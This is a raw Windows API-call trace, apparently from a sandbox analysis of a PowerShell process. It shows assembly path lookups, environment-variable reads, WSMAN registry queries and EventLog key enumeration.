	[0185.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0187.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x29d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0187.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x29d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0187.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0187.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0188.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0188.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0188.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x29d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0188.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x29d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0197.417] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0197.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.417] CoTaskMemFree (pv=0x46e9b0) 
	[0197.418] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0197.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.418] CoTaskMemFree (pv=0x46e9b0) 
	[0197.419] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0197.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.420] CoTaskMemFree (pv=0x46e9b0) 
	[0197.421] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0197.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.421] CoTaskMemFree (pv=0x46e9b0) 
	[0197.430] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0197.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.430] CoTaskMemFree (pv=0x46e9b0) 
	[0197.434] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0197.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.434] CoTaskMemFree (pv=0x46e9b0) 
	[0197.981] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0197.981] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.981] CoTaskMemFree (pv=0x46e9b0) 
	[0197.996] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d728 | out: phkResult=0x29d728*=0x31c) returned 0x0
	[0198.002] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29d62c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d628, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29d62c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d628*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0198.002] CoTaskMemFree (pv=0x0) 
	[0198.002] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0198.002] RegEnumValueW (in: hKey=0x31c, dwIndex=0x0, lpValueName=0x419e90, lpcchValueName=0x29d6d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x29d6d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0198.003] CoTaskMemFree (pv=0x419e90) 
	[0198.003] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0198.003] RegEnumValueW (in: hKey=0x31c, dwIndex=0x1, lpValueName=0x419e90, lpcchValueName=0x29d6d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x29d6d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0198.003] CoTaskMemFree (pv=0x419e90) 
	[0198.003] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0198.003] RegEnumValueW (in: hKey=0x31c, dwIndex=0x2, lpValueName=0x419e90, lpcchValueName=0x29d6d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x29d6d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0198.003] CoTaskMemFree (pv=0x419e90) 
	[0198.004] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x29d6bc, lpData=0x0, lpcbData=0x29d6b8*=0x0 | out: lpType=0x29d6bc*=0x1, lpData=0x0, lpcbData=0x29d6b8*=0x8) returned 0x0
	[0198.004] CoTaskMemAlloc (cb=0xc) returned 0x1b744790
	[0198.004] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x29d68c, lpData=0x1b744790, lpcbData=0x29d688*=0x8 | out: lpType=0x29d68c*=0x1, lpData="2.0", lpcbData=0x29d688*=0x8) returned 0x0
	[0198.004] CoTaskMemFree (pv=0x1b744790) 
	[0203.654] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d678 | out: phkResult=0x29d678*=0x324) returned 0x0
	[0203.654] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29d57c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d578, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29d57c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d578*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.654] CoTaskMemFree (pv=0x0) 
	[0203.654] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0203.654] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x419e90, lpcchValueName=0x29d628, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x29d628, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.654] CoTaskMemFree (pv=0x419e90) 
	[0203.654] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0203.654] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x419e90, lpcchValueName=0x29d628, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x29d628, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.654] CoTaskMemFree (pv=0x419e90) 
	[0203.654] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0203.654] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x419e90, lpcchValueName=0x29d628, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x29d628, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.654] CoTaskMemFree (pv=0x419e90) 
	[0203.654] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x29d60c, lpData=0x0, lpcbData=0x29d608*=0x0 | out: lpType=0x29d60c*=0x1, lpData=0x0, lpcbData=0x29d608*=0x8) returned 0x0
	[0203.654] CoTaskMemAlloc (cb=0xc) returned 0x1b7446b0
	[0203.654] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x29d5dc, lpData=0x1b7446b0, lpcbData=0x29d5d8*=0x8 | out: lpType=0x29d5dc*=0x1, lpData="2.0", lpcbData=0x29d5d8*=0x8) returned 0x0
	[0203.655] CoTaskMemFree (pv=0x1b7446b0) 
	[0203.656] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0203.656] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.656] CoTaskMemFree (pv=0x46e9b0) 
	[0204.159] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0204.159] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.159] CoTaskMemFree (pv=0x46e9b0) 
	[0204.164] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6a8 | out: phkResult=0x29d6a8*=0x2e4) returned 0x0
	[0204.170] RegQueryInfoKeyW (in: hKey=0x2e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29d61c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d618, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29d61c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d618*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.170] CoTaskMemFree (pv=0x0) 
	[0204.170] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0204.170] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x419e90, lpcchName=0x29d6a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x29d6a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.172] CoTaskMemFree (pv=0x419e90) 
	[0204.172] CoTaskMemFree (pv=0x0) 
	[0204.172] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0204.172] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x1, lpName=0x419e90, lpcchName=0x29d6a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x29d6a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.173] CoTaskMemFree (pv=0x419e90) 
	[0204.173] CoTaskMemFree (pv=0x0) 
	[0204.173] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0204.173] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x2, lpName=0x419e90, lpcchName=0x29d6a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x29d6a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.174] CoTaskMemFree (pv=0x419e90) 
	[0204.174] CoTaskMemFree (pv=0x0) 
	[0204.175] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0204.175] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x3, lpName=0x419e90, lpcchName=0x29d6a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x29d6a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.176] CoTaskMemFree (pv=0x419e90) 
	[0204.176] CoTaskMemFree (pv=0x0) 
	[0204.176] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0204.176] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x4, lpName=0x419e90, lpcchName=0x29d6a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x29d6a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.177] CoTaskMemFree (pv=0x419e90) 
	[0204.177] CoTaskMemFree (pv=0x0) 
	[0204.177] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0204.177] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x5, lpName=0x419e90, lpcchName=0x29d6a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x29d6a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.178] CoTaskMemFree (pv=0x419e90) 
	[0204.179] CoTaskMemFree (pv=0x0) 
	[0204.179] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0204.179] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x6, lpName=0x419e90, lpcchName=0x29d6a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x29d6a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.180] CoTaskMemFree (pv=0x419e90) 
	[0204.180] CoTaskMemFree (pv=0x0) 
	[0204.180] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0204.180] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x7, lpName=0x419e90, lpcchName=0x29d6a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x29d6a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.181] CoTaskMemFree (pv=0x419e90) 
	[0204.181] CoTaskMemFree (pv=0x0) 
	[0204.181] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0204.181] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x8, lpName=0x419e90, lpcchName=0x29d6a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x29d6a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.183] CoTaskMemFree (pv=0x419e90) 
	[0204.183] CoTaskMemFree (pv=0x0) 
	[0204.183] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x32c) returned 0x0
	[0204.183] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x0) returned 0x2
	[0204.183] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x304) returned 0x0
	[0204.183] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x0) returned 0x2
	[0204.183] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x308) returned 0x0
	[0204.183] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x0) returned 0x2
	[0204.183] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x30c) returned 0x0
	[0204.183] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x0) returned 0x2
	[0204.183] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x320) returned 0x0
	[0204.183] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x0) returned 0x2
	[0204.183] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x334) returned 0x0
	[0204.184] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x0) returned 0x2
	[0204.184] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x0) returned 0x5
	[0204.198] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x338) returned 0x0
	[0204.198] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x0) returned 0x2
	[0204.198] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x33c) returned 0x0
	[0204.198] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d708 | out: phkResult=0x29d708*=0x340) returned 0x0
	[0204.198] RegCloseKey (hKey=0x340) returned 0x0
	[0204.198] RegCloseKey (hKey=0x2e4) returned 0x0
	[0204.199] RegCloseKey (hKey=0x33c) returned 0x0
	[0204.759] CoTaskMemAlloc (cb=0x804) returned 0x1b75f740
	[0204.759] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b75f740, nSize=0x29d918 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d918) returned 0x1
	[0204.760] CoTaskMemFree (pv=0x1b75f740) 
	[0204.761] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0204.761] GetUserNameW (in: lpBuffer=0x419e90, pcbBuffer=0x29d958 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d958) returned 1
	[0204.761] CoTaskMemFree (pv=0x419e90) 
	[0211.797] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d658 | out: phkResult=0x29d658*=0x344) returned 0x0
	[0211.797] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29d5cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d5c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29d5cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d5c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.797] CoTaskMemFree (pv=0x0) 
	[0211.797] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0211.797] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x419e90, lpcchName=0x29d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x29d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.797] CoTaskMemFree (pv=0x419e90) 
	[0211.797] CoTaskMemFree (pv=0x0) 
	[0211.797] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0211.797] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x419e90, lpcchName=0x29d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x29d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.797] CoTaskMemFree (pv=0x419e90) 
	[0211.797] CoTaskMemFree (pv=0x0) 
	[0211.797] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0211.797] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x419e90, lpcchName=0x29d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x29d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.797] CoTaskMemFree (pv=0x419e90) 
	[0211.797] CoTaskMemFree (pv=0x0) 
	[0211.797] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0211.797] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x419e90, lpcchName=0x29d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x29d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.797] CoTaskMemFree (pv=0x419e90) 
	[0211.797] CoTaskMemFree (pv=0x0) 
	[0211.797] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0211.797] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x419e90, lpcchName=0x29d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x29d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.797] CoTaskMemFree (pv=0x419e90) 
	[0211.798] CoTaskMemFree (pv=0x0) 
	[0211.798] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0211.798] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x419e90, lpcchName=0x29d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x29d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.798] CoTaskMemFree (pv=0x419e90) 
	[0211.798] CoTaskMemFree (pv=0x0) 
	[0211.798] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0211.798] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x419e90, lpcchName=0x29d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x29d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.798] CoTaskMemFree (pv=0x419e90) 
	[0211.798] CoTaskMemFree (pv=0x0) 
	[0211.798] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0211.798] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x419e90, lpcchName=0x29d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x29d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.798] CoTaskMemFree (pv=0x419e90) 
	[0211.798] CoTaskMemFree (pv=0x0) 
	[0211.798] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0211.798] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x419e90, lpcchName=0x29d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x29d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.798] CoTaskMemFree (pv=0x419e90) 
	[0211.798] CoTaskMemFree (pv=0x0) 
	[0211.798] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x348) returned 0x0
	[0211.798] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x0) returned 0x2
	[0211.798] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x34c) returned 0x0
	[0211.798] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x0) returned 0x2
	[0211.798] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x350) returned 0x0
